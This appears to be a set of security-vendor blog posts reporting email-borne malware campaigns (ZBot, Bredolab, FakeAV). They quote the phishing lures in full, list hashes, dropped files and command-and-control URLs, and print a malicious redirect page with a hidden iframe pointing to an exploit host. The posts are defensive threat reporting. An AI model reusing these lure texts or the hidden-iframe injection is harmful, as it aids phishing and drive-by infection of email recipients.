New ZBot variant in messages with subject “YOUR SALE TO CAN PTY LIMITED”


MX Lab intercepted a new ZBot varaint in messages with the subject “YOUR SALE TO CAN PTY LIMITED” and the following body of the email:

Dear ****@****.de

Please find attached correspondence from Colby Young of even date.

Regards

Jillene Smith
Cantle Carmichael Lawyers
PO Box 483
(DX 7876 NEWCASTLE)
Newcastle, NSW, 2300
(P) 02 49 297 500
(F) 02 49 293 611

The email contains the attachment 08-05-2010(10).pdf.zip. Once extracted we found the 16 kB large file 08-05-2010(10).pdf.exe.

Virus Total permlink and MD5: f776ab24302503f7f6e924d0a24ae678.

YouSendIt abused in a malware and spam distribution


MX Lab intercepted a emails with the subject “You have received a file from [email protected] via YouSendIt.” that contains a potential risk of a malicious payload and redirects you to a Canadian Pharmacy web site. The email address in the subject line can be different depending on the spoofed senders address.

The message indicates that you have a file, in this case an audio file in MP4 format, for you to download at YouSendIt, the well known online file sharing and distribution web site.

The URLs in the message however, do not point to the YouSendIt web site but will lead to hxxp://carlaustiniii.org/x.html. When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://spruceteam.com">
</head><body>
<iframe src="hxxp://tartonion.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

We believe that at this stage that these messages have a malicious payload that could infect your computer. Afterwards we got redirected to hxxp://spruceteam.com/, the famous Canadian Pharmacy web site.

MX Lab has detected an increase in combined strategies during the last few weeks and months where emails leads to a web site with malicious code and exploits and then forward the user to a spam web site in the hope that the end user will not note that his computer is also infected with a trojan.

New ZBot trojan appears in ‘tax statement’ and ‘account suspended’ emails


MX Lab intercepted emails regarding a tax statement that contains a new ZBot trojan variant. We noticed different variants in the emails.

Internal Revenue Service with the tax statement

The message comes from spoofed addresses that includes Internal Revenue Service.

Different subjects like the ones below are being used:

Notice of Underreported Income
Your Order with Amazon.com

The body of the email:

Taxpayer ID: bipin-00000299097131US

Tax Type: INCOME TAX

Issue: Unreported/Underreported Income (Fraud Application)

Please review your tax statement on Internal Revenue Service (IRS) (Attached please find)

===================================

Internal Revenue Service

Dear taxpayer,

The Federal income tax is a progressive tax, meaning that the more you earn, the higher your tax rate. Your tax rate depends not just upon your taxable income, but also upon your filing status (single, married filing jointly, etc.).

You’re in a higher tax bracket because:
- your annual income for the last tax year has increased.

Please review your annual tax report immediately at:
(Please find attached file - tax report.zip)

The email has the attachment tax statement.zip or tax report.zip and this archive contains the 140 kB large file tax statement.exe or tax report.exe.

Your internet access is going to get suspended

A second format is with the subject “Your internet access is going to get suspended” and the following body of the email:

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of software authors, artists.
We conduct regular wiretapping on our networks, to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material of your internet access will be suspended.

Sincerely
ISPC Monitoring Team

The trojan is known as Trojan/Win32.Zbot (AhnLab-V3), Suspicious:W32/Malware!Gemini (F-Secure), Mal/Zbot-U (Sophos).

It will create the following files:

%AppData%\Demuy\igin.exe
%AppData%\Kuse\miev.kuu
%Temp%\tmpbe92fc54.bat

The following directories are created:

%AppData%\Demuy
%AppData%\Kuse

A new memory page is created in the address space of the system process:

%System%\cmd.exe

Various Windows registry settings are being modified and new ones will be created. The trojan can establish a connection with the IPs 74.125.65.147, 76.180.242.112 and 77.78.240.115 on port 80.

Connection with the following URLs:

* hxxp://www.google.com/webhp
* hxxp://jocudaidie.ru/9xq/_gate.php
* hxxp://zephehooqu.ru/bin/koethood.bin

The URL hxxp://zephehooqu.ru/bin/koethood.bin will make you download a .bin file named koethood.bin.

At the time of writing this blog post, only 4 AV engines did detect the threat 1 hour after the first submission to Virus Total, so this version is relative new.

Virus Total permlink and MD5: 298a29ce2fe1291e39215fede14ff628.

Amazon_Invoice_viewer.zip is a trojan


MX Lab intercepted some emails with the attachment Amazon_Invoice_viewer.zip that contains the trojan W32/Trojan3.BWX (Authentium), Mal/EncPk-RB (Sophos), Trojan.FakeAV (Symantec).

The email comes from random spoofed email addresses and can contain different subjects like:

As long as it stays unsaid
Mindblowing sales
Exclusive prices
What’s your hobby
Top 5 sales today
Confirm your sample
….

The body of the email also changes so here are some examples:

Your confirmation reqired

Please find attached invoice.

Boost your Dignity

Please find attached invoice.

Add more mass to your manliness

Please find attached invoice.

Your lovegun final destination

Please find attached invoice.

Attached to the email is the file Amazon_Invoice_viewer.zip that contains the 20 kB large file Amazon_Invoice_viewer.exe inside.

Virus Total permlink and MD5: a46dbd99349e1528805d8192777a01ea

New Bredolab variants in the wild


MX Lab intercepted some new Bredobal variants in different messages.

“Report” emails

The first messages is with the subject “report” send from a spoofed email address. The body of the email is very short:

see my report in attach

The email contains the file report.zip which is a ZIP archive with the 16 kB large file report.exe.

The trojan is known as W32/Bredolab.FZ (Authentium), Email-Worm:W32/Waledac.HZ (F-Secure), W32/Bredolab.B!genr (Norman).

At the time of writing, only 9 of the 41 AV engines at Virus Total detect the trojan. Virus Total permlink and MD5: 98f75f039cf618a72ec5074481c0a9a2.

“Review your annual Social Security statement” emails

The messages has the subject “Review your annual Social Security statement” and also comes from spoofed email addresses.

The body of the email:

Due to possible calculation errors, your annual Social Security statement may contain errors.

Open attached file to review your annual Social Security statement.

The email contains the file statement.zip which is a ZIP archive with the 16 kB large file statement.exe.

The trojan is known as W32/Bredolab.FX (Authentium), Gen:Trojan.Heur.FU.amW@aWPlGEii (F-Secure), W32/Bredolab.B!genr (Norman), Trojan.Win32.FakeAV (Ikarus), Sophos (Mal/FakeAV-EE).

At the time of writing, only 15 of the 41 AV engines at Virus Total detect the trojan. Virus Total permlink and MD5: 5b2ad2b93e88b4743221e28ead12475d.

Follow

Get every new post delivered to your Inbox.

Join 347 other followers